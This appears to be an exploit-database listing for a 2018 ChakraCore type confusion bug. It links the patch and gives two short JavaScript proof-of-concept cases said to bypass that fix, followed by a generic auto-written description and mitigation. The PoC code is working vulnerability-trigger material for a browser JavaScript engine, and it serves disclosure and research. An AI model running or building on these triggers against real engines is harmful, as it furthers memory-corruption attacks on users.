header-logo
Suggest Exploit
vendor:
ChakraCore
by:
Microsoft
8.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: ChakraCore
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

Bypassing the Fix for the Bug

This exploit is related to a bug in Microsoft's ChakraCore. The bug is related to type confusion, which can be exploited to bypass the fix for the bug. The exploit involves creating a Number object with a very small value, and then assigning a property to it. This is followed by converting the object to a primitive type, and then assigning a property to it again. This can be repeated multiple times to bypass the fix.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the code is properly tested and that any type confusion issues are identified and fixed.
Source

Exploit-DB raw data:

It seems this is the patch for the bug.
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a

The following two cases will bypass the fix.

1:
function opt() {
    let obj = new Number(2.3023e-320);
    for (let i = 0; i < 1; i++) {
        obj.x = 1;
        obj = +obj;
        obj.x = 1;
    }
}

function main() {
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();

2:
function opt() {
    let obj = '2.3023e-320';
    for (let i = 0; i < 1; i++) {
        obj.x = 1;
        obj = +obj;
        obj.x = 1;
    }
}

function main() {
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();

Navigation

Suggest Exploit

Services By CQR